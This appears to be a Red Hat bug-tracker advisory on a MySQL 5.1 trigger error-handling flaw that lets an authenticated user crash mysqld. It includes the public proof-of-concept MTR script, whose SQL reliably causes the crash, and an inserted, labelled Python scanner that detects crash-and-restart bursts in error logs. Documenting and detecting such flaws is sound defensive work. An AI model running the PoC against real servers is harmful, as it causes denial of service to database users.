It was found that the MySQL server did not properly handle processing of an error message raised during trigger execution while another SELECT SQL statement was active. A remote attacker with a valid SQL user account could use this flaw to cause a denial of service (mysqld daemon crash) via a specially crafted SQL query.

References:
[1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html
[2] http://bugs.mysql.com/bug.php?id=55421

Note: On Red Hat Enterprise Linux systems, exploitation of this issue would lead only to a temporary denial of service, since the mysqld daemon is automatically restarted upon encountering a crash.
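As an added defender-side example (not part of this bug report or of MySQL's own code), the following script scans a MySQL 5.1-style error log for the crash and mysqld_safe auto-restart pattern the note above describes and flags bursts of repeated crashes, which is what a query-triggered denial of service looks like on a host where the daemon is restarted automatically. The log lines, the assumed timestamp layout and the window/threshold values are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumed MySQL 5.1 error-log layout: "YYMMDD HH:MM:SS" prefix, then either the
# crash header mysqld prints ("mysqld got signal N ;") or a mysqld_safe notice.
LINE_RE = re.compile(r"^(\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+-?\s*(.*)$")
CRASH_RE = re.compile(r"mysqld got signal (\d+)")
RESTART_RE = re.compile(r"mysqld_safe mysqld restarted")

# Constructed sample log: three crashes, each followed by an automatic restart.
SAMPLE_LOG = """\
101018 12:00:01 [Note] /usr/libexec/mysqld: ready for connections.
101018 12:05:10 - mysqld got signal 11 ;
101018 12:05:11 mysqld_safe Number of processes running now: 0
101018 12:05:11 mysqld_safe mysqld restarted
101018 12:05:30 - mysqld got signal 11 ;
101018 12:05:31 mysqld_safe mysqld restarted
101018 12:06:02 - mysqld got signal 11 ;
101018 12:06:03 mysqld_safe mysqld restarted
"""

def parse_events(log_text):
    """Return [(timestamp, kind, detail)] for crash and restart lines only."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%y%m%d %H:%M:%S")
        rest = m.group(2)
        crash = CRASH_RE.search(rest)
        if crash:
            events.append((ts, "crash", int(crash.group(1))))
        elif RESTART_RE.search(rest):
            events.append((ts, "restart", None))
    return events

def crash_bursts(events, window=timedelta(minutes=10), threshold=3):
    """Return (first_crash, last_crash, count) for each non-overlapping window
    holding at least `threshold` crashes; a single crash is noise, a burst is
    a client repeatedly tripping the same server bug."""
    crashes = [ts for ts, kind, _ in events if kind == "crash"]
    bursts = []
    for i, start in enumerate(crashes):
        run = [t for t in crashes[i:] if t - start <= window]
        if len(run) >= threshold and (not bursts or start > bursts[-1][1]):
            bursts.append((start, run[-1], len(run)))
    return bursts

if __name__ == "__main__":
    for first, last, n in crash_bursts(parse_events(SAMPLE_LOG)):
        print(f"{n} mysqld crashes between {first} and {last}")
```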
Public PoC from [2]:
====================
# Non-concurrent MTR test
--disable_warnings
DROP DATABASE IF EXISTS celosia_features;
--enable_warnings
CREATE DATABASE celosia_features;
USE celosia_features;
GRANT ALL ON celosia_features.* TO 'systuser'@'localhost';
--connect(con1,localhost,systuser,,celosia_features)
CREATE TABLE t_celosia_1 (
  `user_num` bigint(20) unsigned DEFAULT NULL,
  `year` year(4) DEFAULT NULL,
  `modified` time DEFAULT NULL
);
INSERT INTO t_celosia_1 VALUES (7197513499,1937,'20:36:48');
CREATE TRIGGER celosia_features.upd_t_celosia_1 BEFORE UPDATE ON t_celosia_1 FOR EACH ROW SET new.modified = NOW();
CREATE TABLE `t_celosia_2` (
  `user_num` char(5) DEFAULT NULL,
  `year` year(2) DEFAULT NULL,
  `modified` timestamp NOT NULL
);
INSERT INTO `t_celosia_2` VALUES ('32264',56,'2010-07-18 17:36:31');
--connection default
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'systuser'@'localhost';
UPDATE IGNORE t_celosia_1 table1, t_celosia_2 table2 SET table1.user_num = 192720, table2.user_num = '39582' WHERE table1.year = '1937' AND table2.year = '56';
# Cleanup
DROP DATABASE celosia_features;
DROP USER 'systuser'@'localhost';
--exit
This issue did NOT affect the versions of the mysql package as shipped with Red Hat Enterprise Linux 4, 5, and 6.
--
This issue did NOT affect the versions of the mysql package as shipped with Fedora releases 14 and 15.